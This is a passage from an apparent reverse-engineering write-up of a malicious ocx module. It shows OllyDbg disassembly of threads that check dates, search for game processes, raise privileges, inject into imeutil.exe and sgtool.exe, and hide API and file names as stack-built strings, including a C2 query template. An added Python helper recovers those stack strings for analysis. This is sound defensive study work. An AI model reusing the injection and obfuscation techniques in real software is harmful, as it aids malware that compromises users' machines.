10008DC2 8345 FC 04 add dword ptr [ebp-4], 4
10008DC6 8B45 DC mov eax, dword ptr [ebp-24]
10008DC9 3B05 FC210010 cmp eax, dword ptr [100021FC]
10008DCF ^ 7C DF jl short 10008DB0
10008DD1 33DB xor ebx, ebx
10008DD3 EB 0A jmp short 10008DDF
10008DD5 E8 B0F2FFFF call 1000808A
10008DDA E8 D3F2FFFF call 100080B2
10008DDF 391D 14220010 cmp dword ptr [10002214], ebx
10008DE5 75 11 jnz short 10008DF8
10008DE7 53 push ebx
10008DE8 C705 14220010 0>mov dword ptr [10002214], 1
10008DF2 E8 1FFCFFFF call 10008A16
10008DF7 59 pop ecx
10008DF8 891D E8200010 mov dword ptr [100020E8], ebx
10008DFE 5F pop edi
10008DFF 5E pop esi
10008E00 5B pop ebx
10008E01 C9 leave
10008E02 C3 retn
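The byte-at-a-time stores in thread 4 (`mov byte ptr [ebp-1C], 25` through `mov byte ptr [ebp-6], bl`) assemble the wsprintfA format string on the stack so that it never appears in the module's string table; thread 6 builds the process names imeutil.exe and sgtool.exe the same way. As an added example, not code from the original post, the Python helper below recovers such stack strings from an OllyDbg-style listing. The listing excerpt embedded in it is copied from the thread 4 and thread 6 dumps above (addresses and opcode bytes dropped); treating `bl` as zero (it was cleared with `xor ebx, ebx`) and `and byte ptr [...], 0` as a terminator is an assumption about this listing, and it goes a little beyond the thread 4 case by separating several strings in one listing.

```python
import re

# One store into an ebp-relative stack slot, as OllyDbg prints it, e.g.
#   mov byte ptr [ebp-1C], 25
#   mov byte ptr [ebp-6], bl     (assumption: bl is 0, cleared by xor ebx, ebx)
#   and byte ptr [ebp-1C], 0     (explicit NUL terminator)
# Slots addressed through another register ([ebp+eax-228]) are ignored.
_STORE = re.compile(
    r"\b(?:mov|and)\s+byte ptr \[ebp-([0-9A-F]+)\],\s*([0-9A-F]{1,2}|bl)\b",
    re.IGNORECASE,
)


def recover_stack_strings(listing, min_len=4):
    """Return printable ASCII strings assembled byte-by-byte on the stack.

    Slots are keyed by ebp-relative offset; adjacent slots form a run, runs
    are cut at NUL bytes and at gaps, and results are ordered by the line on
    which each string's lowest byte was written.
    """
    slots, first_line = {}, {}
    for lineno, line in enumerate(listing.splitlines()):
        m = _STORE.search(line)
        if not m:
            continue
        off = -int(m.group(1), 16)
        val = 0 if m.group(2).lower() == "bl" else int(m.group(2), 16)
        slots[off] = val
        first_line.setdefault(off, lineno)

    found, buf, start = [], [], None

    def flush():
        # Keep only runs that are long enough and entirely printable ASCII.
        if len(buf) >= min_len and all(0x20 <= b < 0x7F for b in buf):
            found.append((first_line[start], bytes(buf).decode("ascii")))

    prev = None
    for off in sorted(slots):  # ascending address = string order
        if prev is not None and off != prev + 1:
            flush()
            buf, start = [], None
        if slots[off] == 0:
            flush()
            buf, start = [], None
        else:
            if start is None:
                start = off
            buf.append(slots[off])
        prev = off
    flush()
    return [text for _, text in sorted(found)]


# Constructed sample: instruction text copied from the thread 4 and thread 6
# listings in the post (addresses and opcode bytes dropped, comments kept).
SAMPLE_LISTING = """
push 10001CBC
mov byte ptr [ebp-1C], 25
mov byte ptr [ebp-1B], 73
mov byte ptr [ebp-1A], 3F
mov byte ptr [ebp-19], 61
mov byte ptr [ebp-18], 63
mov byte ptr [ebp-17], 74
mov byte ptr [ebp-16], 69
mov byte ptr [ebp-15], 6F
mov byte ptr [ebp-14], 6E
mov byte ptr [ebp-13], 3D
mov byte ptr [ebp-12], 67
mov byte ptr [ebp-11], 65
mov byte ptr [ebp-10], 74
mov byte ptr [ebp-F], 70
mov byte ptr [ebp-E], 72
mov byte ptr [ebp-D], 6F
mov byte ptr [ebp-C], 63
mov byte ptr [ebp-B], 26
mov byte ptr [ebp-A], 75
mov byte ptr [ebp-9], 3D
mov byte ptr [ebp-8], 25
mov byte ptr [ebp-7], 73
mov byte ptr [ebp-6], bl
call dword ptr [<&USER32.wsprintfA>]
mov byte ptr [ebp-11C], 69 ; imeutil.exe
mov byte ptr [ebp-11B], 6D
mov byte ptr [ebp-11A], 65
mov byte ptr [ebp-119], 75
mov byte ptr [ebp-118], 74
mov byte ptr [ebp-117], 69
mov byte ptr [ebp-116], 6C
mov byte ptr [ebp-115], 2E
mov byte ptr [ebp-114], 65
mov byte ptr [ebp-113], 78
mov byte ptr [ebp-112], 65
mov byte ptr [ebp-111], bl
mov byte ptr [ebp+eax-228], bl
"""

if __name__ == "__main__":
    for s in recover_stack_strings(SAMPLE_LISTING):
        print(s)
```

Run over the sample this yields the C2 query template `%s?action=getproc&u=%s` (the `? action=getproc&u=` the analyst noted after the wsprintfA call) followed by `imeutil.exe`; pasting a whole OllyDbg dump of the ocx in place of the sample is enough to list every stack string it builds this way.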




Thread 5
1000AB68 55 push ebp ; thread 5
1000AB69 8BEC mov ebp, esp
1000AB6B 6A FF push -1
1000AB6D 68 903F0010 push 10003F90
1000AB72 68 C0AD0010 push <jmp.&MSVCRT._except_handler3>
1000AB77 64:A1 00000000 mov eax, dword ptr fs:[0]
1000AB7D 50 push eax
1000AB7E 64:8925 0000000>mov dword ptr fs:[0], esp
1000AB85 81EC 70020000 sub esp, 270
1000AB8B 53 push ebx
1000AB8C 56 push esi
1000AB8D 57 push edi
1000AB8E 8965 E8 mov dword ptr [ebp-18], esp
1000AB91 80A5 D4FEFFFF 0>and byte ptr [ebp-12C], 0
1000AB98 6A 40 push 40
1000AB9A 59 pop ecx
1000AB9B 33C0 xor eax, eax
1000AB9D 8DBD D5FEFFFF lea edi, dword ptr [ebp-12B]
1000ABA3 F3:AB rep stos dword ptr es:[edi]
1000ABA5 66:AB stos word ptr es:[edi]
1000ABA7 AA stos byte ptr es:[edi]
1000ABA8 C645 D8 65 mov byte ptr [ebp-28], 65
1000ABAC C645 D9 78 mov byte ptr [ebp-27], 78
1000ABB0 C645 DA 70 mov byte ptr [ebp-26], 70
1000ABB4 C645 DB 6C mov byte ptr [ebp-25], 6C
1000ABB8 C645 DC 6F mov byte ptr [ebp-24], 6F
1000ABBC C645 DD 72 mov byte ptr [ebp-23], 72
1000ABC0 C645 DE 65 mov byte ptr [ebp-22], 65
1000ABC4 C645 DF 72 mov byte ptr [ebp-21], 72
1000ABC8 C645 E0 2E mov byte ptr [ebp-20], 2E
1000ABCC C645 E1 65 mov byte ptr [ebp-1F], 65
1000ABD0 C645 E2 78 mov byte ptr [ebp-1E], 78
1000ABD4 C645 E3 65 mov byte ptr [ebp-1D], 65
1000ABD8 8065 E4 00 and byte ptr [ebp-1C], 0
1000ABDC 80A5 90FEFFFF 0>and byte ptr [ebp-170], 0
1000ABE3 6A 0F push 0F
1000ABE5 59 pop ecx
1000ABE6 33C0 xor eax, eax
1000ABE8 8DBD 91FEFFFF lea edi, dword ptr [ebp-16F]
1000ABEE F3:AB rep stos dword ptr es:[edi]
1000ABF0 66:AB stos word ptr es:[edi]
1000ABF2 AA stos byte ptr es:[edi]
1000ABF3 68 683D0010 push 10003D68 ; ASCII "ldjgam"
1000ABF8 8D85 90FEFFFF lea eax, dword ptr [ebp-170]
1000ABFE 50 push eax
1000ABFF E8 CE010000 call <jmp.&MSVCRT.strcpy>
1000AC04 68 603D0010 push 10003D60 ; ASCII "e.exe"
1000AC09 8D85 90FEFFFF lea eax, dword ptr [ebp-170]
1000AC0F 50 push eax
1000AC10 E8 B1010000 call <jmp.&MSVCRT.strcat>
1000AC15 BE D82C0010 mov esi, 10002CD8
1000AC1A 56 push esi
1000AC1B 8B1D 70310010 mov ebx, dword ptr [<&MSVCRT._strlwr>] ; msvcrt._strlwr
1000AC21 FFD3 call ebx
1000AC23 8D45 D8 lea eax, dword ptr [ebp-28]
1000AC26 50 push eax
1000AC27 56 push esi
1000AC28 FF15 B4310010 call dword ptr [<&MSVCRT.strstr>] ; msvcrt.strstr
1000AC2E 83C4 1C add esp, 1C
1000AC31 85C0 test eax, eax
1000AC33 74 29 je short 1000AC5E
1000AC35 33FF xor edi, edi
1000AC37 57 push edi
1000AC38 E8 F5CBFFFF call 10007832
1000AC3D 59 pop ecx
1000AC3E 57 push edi
1000AC3F 57 push edi
1000AC40 57 push edi
1000AC41 68 BF900010 push 100090BF
1000AC46 57 push edi
1000AC47 57 push edi
1000AC48 FF15 DC300010 call dword ptr [<&KERNEL32.CreateThread>] ; kernel32.CreateThread
1000AC4E 57 push edi
1000AC4F 57 push edi
1000AC50 57 push edi
1000AC51 68 1C910010 push 1000911C
1000AC56 57 push edi
1000AC57 57 push edi
1000AC58 FF15 DC300010 call dword ptr [<&KERNEL32.CreateThread>] ; kernel32.CreateThread
1000AC5E 80A5 88FDFFFF 0>and byte ptr [ebp-278], 0
1000AC65 6A 40 push 40
1000AC67 59 pop ecx
1000AC68 33C0 xor eax, eax
1000AC6A 8DBD 89FDFFFF lea edi, dword ptr [ebp-277]
1000AC70 F3:AB rep stos dword ptr es:[edi]
1000AC72 66:AB stos word ptr es:[edi]
1000AC74 AA stos byte ptr es:[edi]
1000AC75 68 04010000 push 104
1000AC7A 8D85 D4FEFFFF lea eax, dword ptr [ebp-12C]
1000AC80 50 push eax
1000AC81 6A 00 push 0
1000AC83 FF15 4C300010 call dword ptr [<&KERNEL32.GetModuleFileNa>; kernel32.GetModuleFileNameA
1000AC89 8365 FC 00 and dword ptr [ebp-4], 0
1000AC8D E8 B19FFFFF call 10004C43 ; date check, 2011.8.19
1000AC92 85C0 test eax, eax
1000AC94 0F85 D6000000 jnz 1000AD70
1000AC9A 8D85 90FEFFFF lea eax, dword ptr [ebp-170]
1000ACA0 50 push eax
1000ACA1 8D85 88FDFFFF lea eax, dword ptr [ebp-278]
1000ACA7 50 push eax
1000ACA8 E8 25010000 call <jmp.&MSVCRT.strcpy>
1000ACAD 59 pop ecx
1000ACAE 59 pop ecx
1000ACAF FF15 2C310010 call dword ptr [<&KERNEL32.GetCurrentProce>; kernel32.GetCurrentProcessId
1000ACB5 8985 D0FEFFFF mov dword ptr [ebp-130], eax
1000ACBB 56 push esi
1000ACBC FFD3 call ebx
1000ACBE 8D85 88FDFFFF lea eax, dword ptr [ebp-278]
1000ACC4 50 push eax
1000ACC5 FFD3 call ebx
1000ACC7 8D85 88FDFFFF lea eax, dword ptr [ebp-278]
1000ACCD 50 push eax
1000ACCE 56 push esi
1000ACCF 8B3D B4310010 mov edi, dword ptr [<&MSVCRT.strstr>] ; msvcrt.strstr
1000ACD5 FFD7 call edi
1000ACD7 83C4 10 add esp, 10
1000ACDA 85C0 test eax, eax
1000ACDC 74 42 je short 1000AD20
1000ACDE 6A 5C push 5C
1000ACE0 8D85 D4FEFFFF lea eax, dword ptr [ebp-12C]
1000ACE6 50 push eax
1000ACE7 FF15 94310010 call dword ptr [<&MSVCRT.strrchr>] ; msvcrt.strrchr
1000ACED 59 pop ecx
1000ACEE 59 pop ecx
1000ACEF 8BF0 mov esi, eax
1000ACF1 46 inc esi
1000ACF2 89B5 8CFEFFFF mov dword ptr [ebp-174], esi
1000ACF8 83A5 84FDFFFF 0>and dword ptr [ebp-27C], 0
1000ACFF 8B85 84FDFFFF mov eax, dword ptr [ebp-27C]
1000AD05 8B0485 0C3F0010 mov eax, dword ptr [eax*4+10003F0C]
1000AD0C 85C0 test eax, eax
1000AD0E 74 60 je short 1000AD70
1000AD10 56 push esi
1000AD11 FFD0 call eax
1000AD13 59 pop ecx
1000AD14 85C0 test eax, eax
1000AD16 75 58 jnz short 1000AD70
1000AD18 FF85 84FDFFFF inc dword ptr [ebp-27C]
1000AD1E ^ EB DF jmp short 1000ACFF
1000AD20 68 703D0010 push 10003D70 ; ASCII "launch.exe"
1000AD25 56 push esi
1000AD26 FFD7 call edi
1000AD28 59 pop ecx
1000AD29 59 pop ecx
1000AD2A 85C0 test eax, eax
1000AD2C 74 42 je short 1000AD70
1000AD2E 6A 5C push 5C
1000AD30 8D85 D4FEFFFF lea eax, dword ptr [ebp-12C]
1000AD36 50 push eax
1000AD37 FF15 94310010 call dword ptr [<&MSVCRT.strrchr>] ; msvcrt.strrchr
1000AD3D 59 pop ecx
1000AD3E 59 pop ecx
1000AD3F 8BF0 mov esi, eax
1000AD41 46 inc esi
1000AD42 89B5 8CFEFFFF mov dword ptr [ebp-174], esi
1000AD48 83A5 80FDFFFF 0>and dword ptr [ebp-280], 0
1000AD4F 8B85 80FDFFFF mov eax, dword ptr [ebp-280]
1000AD55 8B0485 0C3F0010 mov eax, dword ptr [eax*4+10003F0C]
1000AD5C 85C0 test eax, eax
1000AD5E 74 10 je short 1000AD70
1000AD60 56 push esi
1000AD61 FFD0 call eax
1000AD63 59 pop ecx
1000AD64 85C0 test eax, eax
1000AD66 75 08 jnz short 1000AD70
1000AD68 FF85 80FDFFFF inc dword ptr [ebp-280]
1000AD6E ^ EB DF jmp short 1000AD4F
1000AD70 834D FC FF or dword ptr [ebp-4], FFFFFFFF
1000AD74 6A 01 push 1
1000AD76 58 pop eax
1000AD77 EB 0D jmp short 1000AD86
1000AD79 6A 01 push 1
1000AD7B 58 pop eax
1000AD7C C3 retn


Thread 6 mainly carries out the injection through imeutil.exe and sgtool.exe, writing data into them:
1000911C 55 push ebp ; thread 6
1000911D 8BEC mov ebp, esp
1000911F 6A FF push -1
10009121 68 803F0010 push 10003F80
10009126 68 C0AD0010 push <jmp.&MSVCRT._except_handler3>
1000912B 64:A1 00000000 mov eax, dword ptr fs:[0]
10009131 50 push eax
10009132 64:8925 0000000>mov dword ptr fs:[0], esp
10009139 81EC 740A0000 sub esp, 0A74
1000913F 53 push ebx
10009140 56 push esi
10009141 57 push edi
10009142 8965 E8 mov dword ptr [ebp-18], esp
10009145 C785 94FBFFFF 0>mov dword ptr [ebp-46C], 1
1000914F 33DB xor ebx, ebx
10009151 889D E0FDFFFF mov byte ptr [ebp-220], bl
10009157 6A 40 push 40
10009159 59 pop ecx
1000915A 33C0 xor eax, eax
1000915C 8DBD E1FDFFFF lea edi, dword ptr [ebp-21F]
10009162 F3:AB rep stos dword ptr es:[edi]
10009164 66:AB stos word ptr es:[edi]
10009166 AA stos byte ptr es:[edi]
10009167 6A 63 push 63
10009169 8D85 E0FDFFFF lea eax, dword ptr [ebp-220]
1000916F 50 push eax
10009170 E8 C8E5FFFF call 1000773D ; locate the two ocx files
10009175 E8 9FB2FFFF call 10004419 ; raise privileges
1000917A C685 E4FEFFFF 6>mov byte ptr [ebp-11C], 69 ; imeutil.exe
10009181 C685 E5FEFFFF 6>mov byte ptr [ebp-11B], 6D
10009188 C685 E6FEFFFF 6>mov byte ptr [ebp-11A], 65
1000918F C685 E7FEFFFF 7>mov byte ptr [ebp-119], 75
10009196 C685 E8FEFFFF 7>mov byte ptr [ebp-118], 74
1000919D C685 E9FEFFFF 6>mov byte ptr [ebp-117], 69
100091A4 C685 EAFEFFFF 6>mov byte ptr [ebp-116], 6C
100091AB C685 EBFEFFFF 2>mov byte ptr [ebp-115], 2E
100091B2 C685 ECFEFFFF 6>mov byte ptr [ebp-114], 65
100091B9 C685 EDFEFFFF 7>mov byte ptr [ebp-113], 78
100091C0 C685 EEFEFFFF 6>mov byte ptr [ebp-112], 65
100091C7 889D EFFEFFFF mov byte ptr [ebp-111], bl
100091CD 6A 3E push 3E
100091CF 5E pop esi
100091D0 8BCE mov ecx, esi
100091D2 33C0 xor eax, eax
100091D4 8DBD F0FEFFFF lea edi, dword ptr [ebp-110]
100091DA F3:AB rep stos dword ptr es:[edi]
100091DC C685 98FBFFFF 7>mov byte ptr [ebp-468], 73
100091E3 C685 99FBFFFF 6>mov byte ptr [ebp-467], 67 ; sgtool.exe
100091EA C685 9AFBFFFF 7>mov byte ptr [ebp-466], 74
100091F1 C685 9BFBFFFF 6>mov byte ptr [ebp-465], 6F
100091F8 C685 9CFBFFFF 6>mov byte ptr [ebp-464], 6F
100091FF C685 9DFBFFFF 6>mov byte ptr [ebp-463], 6C
10009206 C685 9EFBFFFF 2>mov byte ptr [ebp-462], 2E
1000920D C685 9FFBFFFF 6>mov byte ptr [ebp-461], 65
10009214 C685 A0FBFFFF 7>mov byte ptr [ebp-460], 78
1000921B C685 A1FBFFFF 6>mov byte ptr [ebp-45F], 65
10009222 889D A2FBFFFF mov byte ptr [ebp-45E], bl
10009228 8BCE mov ecx, esi
1000922A 8DBD A3FBFFFF lea edi, dword ptr [ebp-45D]
10009230 F3:AB rep stos dword ptr es:[edi]
10009232 AA stos byte ptr es:[edi]
10009233 889D 9CFCFFFF mov byte ptr [ebp-364], bl
10009239 6A 0F push 0F
1000923B 59 pop ecx
1000923C 33C0 xor eax, eax
1000923E 8DBD 9DFCFFFF lea edi, dword ptr [ebp-363]
10009244 F3:AB rep stos dword ptr es:[edi]
10009246 66:AB stos word ptr es:[edi]
10009248 AA stos byte ptr es:[edi]
10009249 68 683D0010 push 10003D68 ; ASCII "ldjgam"
1000924E 8D85 9CFCFFFF lea eax, dword ptr [ebp-364]
10009254 50 push eax
10009255 E8 781B0000 call <jmp.&MSVCRT.strcpy>
1000925A 68 603D0010 push 10003D60 ; ASCII "e.exe"
1000925F 8D85 9CFCFFFF lea eax, dword ptr [ebp-364]
10009265 50 push eax
10009266 E8 5B1B0000 call <jmp.&MSVCRT.strcat>
1000926B 83C4 18 add esp, 18
1000926E 889D 8CF9FFFF mov byte ptr [ebp-674], bl
10009274 6A 40 push 40
10009276 59 pop ecx
10009277 33C0 xor eax, eax
10009279 8DBD 8DF9FFFF lea edi, dword ptr [ebp-673]
1000927F F3:AB rep stos dword ptr es:[edi]
10009281 66:AB stos word ptr es:[edi]
10009283 AA stos byte ptr es:[edi]
10009284 889D 90FAFFFF mov byte ptr [ebp-570], bl
1000928A 6A 40 push 40
1000928C 59 pop ecx
1000928D 33C0 xor eax, eax
1000928F 8DBD 91FAFFFF lea edi, dword ptr [ebp-56F]
10009295 F3:AB rep stos dword ptr es:[edi]
10009297 66:AB stos word ptr es:[edi]
10009299 AA stos byte ptr es:[edi]
1000929A 889D DCFCFFFF mov byte ptr [ebp-324], bl
100092A0 6A 40 push 40
100092A2 59 pop ecx
100092A3 33C0 xor eax, eax
100092A5 8DBD DDFCFFFF lea edi, dword ptr [ebp-323]
100092AB F3:AB rep stos dword ptr es:[edi]
100092AD 66:AB stos word ptr es:[edi]
100092AF AA stos byte ptr es:[edi]
100092B0 895D FC mov dword ptr [ebp-4], ebx
100092B3 399D 94FBFFFF cmp dword ptr [ebp-46C], ebx
100092B9 0F84 B2010000 je 10009471
100092BF 889D 88F8FFFF mov byte ptr [ebp-778], bl
100092C5 6A 40 push 40
100092C7 59 pop ecx
100092C8 33C0 xor eax, eax
100092CA 8DBD 89F8FFFF lea edi, dword ptr [ebp-777]
100092D0 F3:AB rep stos dword ptr es:[edi]
100092D2 66:AB stos word ptr es:[edi]
100092D4 AA stos byte ptr es:[edi]
100092D5 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
100092DB 50 push eax
100092DC E8 6DFBFFFF call 10008E4E ; step over
100092E1 59 pop ecx
100092E2 48 dec eax
100092E3 F7D8 neg eax
100092E5 1BC0 sbb eax, eax
100092E7 F7D8 neg eax
100092E9 8985 94FBFFFF mov dword ptr [ebp-46C], eax
100092EF 0F85 A3010000 jnz 10009498
100092F5 C685 80F6FFFF 6>mov byte ptr [ebp-980], 64 ; d
100092FC C685 81F6FFFF 7>mov byte ptr [ebp-97F], 73 ; s
10009303 C685 82F6FFFF 6>mov byte ptr [ebp-97E], 6F ; o
1000930A C685 83F6FFFF 7>mov byte ptr [ebp-97D], 75 ; u
10009311 C685 84F6FFFF 6>mov byte ptr [ebp-97C], 6E ; n
10009318 C685 85F6FFFF 6>mov byte ptr [ebp-97B], 64 ; d
1000931F C685 86F6FFFF 2>mov byte ptr [ebp-97A], 2E ; .
10009326 C685 87F6FFFF 6>mov byte ptr [ebp-979], 64 ; d
1000932D C685 88F6FFFF 6>mov byte ptr [ebp-978], 6C ; l
10009334 C685 89F6FFFF 6>mov byte ptr [ebp-977], 6C ; l
1000933B 889D 8AF6FFFF mov byte ptr [ebp-976], bl
10009341 8BCE mov ecx, esi
10009343 33C0 xor eax, eax
10009345 8DBD 8BF6FFFF lea edi, dword ptr [ebp-975]
1000934B F3:AB rep stos dword ptr es:[edi]
1000934D AA stos byte ptr es:[edi]
1000934E C685 84F7FFFF 6>mov byte ptr [ebp-87C], 64 ; d
10009355 C685 85F7FFFF 6>mov byte ptr [ebp-87B], 64 ; d
1000935C C685 86F7FFFF 7>mov byte ptr [ebp-87A], 72 ; r
10009363 C685 87F7FFFF 6>mov byte ptr [ebp-879], 61 ; a
1000936A C685 88F7FFFF 7>mov byte ptr [ebp-878], 77 ; w
10009371 C685 89F7FFFF 2>mov byte ptr [ebp-877], 2E ; .
10009378 C685 8AF7FFFF 6>mov byte ptr [ebp-876], 64 ; d
1000937F C685 8BF7FFFF 6>mov byte ptr [ebp-875], 6C ; l
10009386 C685 8CF7FFFF 6>mov byte ptr [ebp-874], 6C ; l
1000938D 889D 8DF7FFFF mov byte ptr [ebp-873], bl
10009393 8BCE mov ecx, esi
10009395 33C0 xor eax, eax
10009397 8DBD 8EF7FFFF lea edi, dword ptr [ebp-872]
1000939D F3:AB rep stos dword ptr es:[edi]
1000939F 66:AB stos word ptr es:[edi]
100093A1 C685 7CF5FFFF 6>mov byte ptr [ebp-A84], 63 ; c
100093A8 C685 7DF5FFFF 6>mov byte ptr [ebp-A83], 6F ; o
100093AF C685 7EF5FFFF 6>mov byte ptr [ebp-A82], 6D ; m
100093B6 C685 7FF5FFFF 7>mov byte ptr [ebp-A81], 72 ; r
100093BD C685 80F5FFFF 6>mov byte ptr [ebp-A80], 65 ; e
100093C4 C685 81F5FFFF 7>mov byte ptr [ebp-A7F], 73 ; s
100093CB C685 82F5FFFF 2>mov byte ptr [ebp-A7E], 2E ; .
100093D2 C685 83F5FFFF 6>mov byte ptr [ebp-A7D], 64 ; d
100093D9 C685 84F5FFFF 6>mov byte ptr [ebp-A7C], 6C ; l
100093E0 C685 85F5FFFF 6>mov byte ptr [ebp-A7B], 6C ; l
100093E7 889D 86F5FFFF mov byte ptr [ebp-A7A], bl
100093ED 8BCE mov ecx, esi
100093EF 33C0 xor eax, eax
100093F1 8DBD 87F5FFFF lea edi, dword ptr [ebp-A79]
100093F7 F3:AB rep stos dword ptr es:[edi]
100093F9 AA stos byte ptr es:[edi]
100093FA 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
10009400 50 push eax
10009401 8D85 8CF9FFFF lea eax, dword ptr [ebp-674]
10009407 50 push eax
10009408 E8 C5190000 call <jmp.&MSVCRT.strcpy>
1000940D 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
10009413 50 push eax
10009414 8D85 90FAFFFF lea eax, dword ptr [ebp-570]
1000941A 50 push eax
1000941B E8 B2190000 call <jmp.&MSVCRT.strcpy>
10009420 8D85 88F8FFFF lea eax, dword ptr [ebp-778]
10009426 50 push eax
10009427 8D85 DCFCFFFF lea eax, dword ptr [ebp-324]
1000942D 50 push eax
1000942E E8 9F190000 call <jmp.&MSVCRT.strcpy>
10009433 8D85 80F6FFFF lea eax, dword ptr [ebp-980]
10009439 50 push eax
1000943A 8D85 8CF9FFFF lea eax, dword ptr [ebp-674]
10009440 50 push eax
10009441 E8 80190000 call <jmp.&MSVCRT.strcat>
10009446 8D85 84F7FFFF lea eax, dword ptr [ebp-87C]
1000944C 50 push eax
1000944D 8D85 90FAFFFF lea eax, dword ptr [ebp-570]
10009453 50 push eax
10009454 E8 6D190000 call <jmp.&MSVCRT.strcat>
10009459 8D85 7CF5FFFF lea eax, dword ptr [ebp-A84]
1000945F 50 push eax
10009460 8D85 DCFCFFFF lea eax, dword ptr [ebp-324]
10009466 50 push eax
10009467 E8 5A190000 call <jmp.&MSVCRT.strcat>
1000946C 83C4 30 add esp, 30
1000946F EB 27 jmp short 10009498
10009471 8D85 8CF9FFFF lea eax, dword ptr [ebp-674]
10009477 50 push eax
10009478 E8 AAF9FFFF call 10008E27
1000947D 8D85 90FAFFFF lea eax, dword ptr [ebp-570]
10009483 50 push eax
10009484 E8 9EF9FFFF call 10008E27
10009489 8D85 DCFCFFFF lea eax, dword ptr [ebp-324]
1000948F 50 push eax
10009490 E8 92F9FFFF call 10008E27
10009495 83C4 0C add esp, 0C
10009498 8D85 E0FDFFFF lea eax, dword ptr [ebp-220]
1000949E 50 push eax
1000949F 8D85 9CFCFFFF lea eax, dword ptr [ebp-364]
100094A5 50 push eax
100094A6 E8 4EADFFFF call 100041F9 ; check whether an ldjgame process exists
100094AB 59 pop ecx
100094AC 59 pop ecx
100094AD 6A 0A push 0A
100094AF 8B3D B0300010 mov edi, dword ptr [<&KERNEL32.Sleep>] ; kernel32.Sleep
100094B5 FFD7 call edi
100094B7 8D85 E0FDFFFF lea eax, dword ptr [ebp-220]
100094BD 50 push eax
100094BE 68 703D0010 push 10003D70 ; ASCII "launch.exe"
100094C3 E8 31ADFFFF call 100041F9
100094C8 59 pop ecx
100094C9 59 pop ecx
100094CA 6A 0A push 0A
100094CC FFD7 call edi
100094CE 6A 0A push 0A
100094D0 FFD7 call edi
100094D2 6A 01 push 1
100094D4 8D85 E4FEFFFF lea eax, dword ptr [ebp-11C]
100094DA 50 push eax
100094DB E8 EF110000 call 1000A6CF ; enumerate processes looking for imeutil.exe
100094E0 6A 01 push 1
100094E2 8D85 98FBFFFF lea eax, dword ptr [ebp-468]
100094E8 50 push eax
100094E9 E8 E1110000 call 1000A6CF ; enumerate processes looking for sgtool.exe
100094EE 83C4 10 add esp, 10
100094F1 68 E6030000 push 3E6
100094F6 FFD7 call edi
100094F8 ^ E9 B6FDFFFF jmp 100092B3
100094FD 6A 01 push 1
100094FF 58 pop eax
10009500 C3 retn
10009501 8B65 E8 mov esp, dword ptr [ebp-18]
10009504 834D FC FF or dword ptr [ebp-4], FFFFFFFF
10009508 33C0 xor eax, eax
1000950A 8B4D F0 mov ecx, dword ptr [ebp-10]
1000950D 64:890D 0000000>mov dword ptr fs:[0], ecx
10009514 5F pop edi
10009515 5E pop esi
10009516 5B pop ebx
10009517 C9 leave
10009518 C2 0400 retn 4




Now look at the call to 100041F9:
100041F9 55 push ebp
100041FA 8BEC mov ebp, esp
100041FC 81EC 68010000 sub esp, 168
10004202 8365 C0 00 and dword ptr [ebp-40], 0
10004206 8065 DC 00 and byte ptr [ebp-24], 0
1000420A 8065 EE 00 and byte ptr [ebp-12], 0
1000420E 8065 FD 00 and byte ptr [ebp-3], 0
10004212 53 push ebx
10004213 56 push esi
10004214 8B35 10310010 mov esi, dword ptr [<&KERNEL32.LoadL>; kernel32.LoadLibraryA
1000421A 8D45 C4 lea eax, dword ptr [ebp-3C]
1000421D 57 push edi
1000421E BB 40320010 mov ebx, 10003240 ; ASCII "Kernel32.dll"
10004223 50 push eax
10004224 53 push ebx
10004225 C645 C4 43 mov byte ptr [ebp-3C], 43
10004229 C645 C5 72 mov byte ptr [ebp-3B], 72
1000422D C645 C6 65 mov byte ptr [ebp-3A], 65
10004231 C645 C7 61 mov byte ptr [ebp-39], 61
10004235 C645 C8 74 mov byte ptr [ebp-38], 74
10004239 C645 C9 65 mov byte ptr [ebp-37], 65
1000423D C645 CA 54 mov byte ptr [ebp-36], 54
10004241 C645 CB 6F mov byte ptr [ebp-35], 6F
10004245 C645 CC 6F mov byte ptr [ebp-34], 6F
10004249 C645 CD 6C mov byte ptr [ebp-33], 6C
1000424D C645 CE 68 mov byte ptr [ebp-32], 68
10004251 C645 CF 65 mov byte ptr [ebp-31], 65
10004255 C645 D0 6C mov byte ptr [ebp-30], 6C
10004259 C645 D1 70 mov byte ptr [ebp-2F], 70
1000425D C645 D2 33 mov byte ptr [ebp-2E], 33
10004261 C645 D3 32 mov byte ptr [ebp-2D], 32
10004265 C645 D4 53 mov byte ptr [ebp-2C], 53
10004269 C645 D5 6E mov byte ptr [ebp-2B], 6E
1000426D C645 D6 61 mov byte ptr [ebp-2A], 61
10004271 C645 D7 70 mov byte ptr [ebp-29], 70
10004275 C645 D8 73 mov byte ptr [ebp-28], 73
10004279 C645 D9 68 mov byte ptr [ebp-27], 68
1000427D C645 DA 6F mov byte ptr [ebp-26], 6F
10004281 C645 DB 74 mov byte ptr [ebp-25], 74
10004285 C645 E0 50 mov byte ptr [ebp-20], 50
10004289 C645 E1 72 mov byte ptr [ebp-1F], 72
1000428D C645 E2 6F mov byte ptr [ebp-1E], 6F
10004291 C645 E3 63 mov byte ptr [ebp-1D], 63
10004295 C645 E4 65 mov byte ptr [ebp-1C], 65
10004299 C645 E5 73 mov byte ptr [ebp-1B], 73
1000429D C645 E6 73 mov byte ptr [ebp-1A], 73
100042A1 C645 E7 33 mov byte ptr [ebp-19], 33
100042A5 C645 E8 32 mov byte ptr [ebp-18], 32
100042A9 C645 E9 46 mov byte ptr [ebp-17], 46
100042AD C645 EA 69 mov byte ptr [ebp-16], 69
100042B1 C645 EB 72 mov byte ptr [ebp-15], 72
100042B5 C645 EC 73 mov byte ptr [ebp-14], 73
100042B9 C645 ED 74 mov byte ptr [ebp-13], 74
100042BD C645 F0 50 mov byte ptr [ebp-10], 50
100042C1 C645 F1 72 mov byte ptr [ebp-F], 72
100042C5 C645 F2 6F mov byte ptr [ebp-E], 6F
100042C9 C645 F3 63 mov byte ptr [ebp-D], 63
100042CD C645 F4 65 mov byte ptr [ebp-C], 65
100042D1 C645 F5 73 mov byte ptr [ebp-B], 73
100042D5 C645 F6 73 mov byte ptr [ebp-A], 73
100042D9 C645 F7 33 mov byte ptr [ebp-9], 33
100042DD C645 F8 32 mov byte ptr [ebp-8], 32
100042E1 C645 F9 4E mov byte ptr [ebp-7], 4E
100042E5 C645 FA 65 mov byte ptr [ebp-6], 65
100042E9 C645 FB 78 mov byte ptr [ebp-5], 78
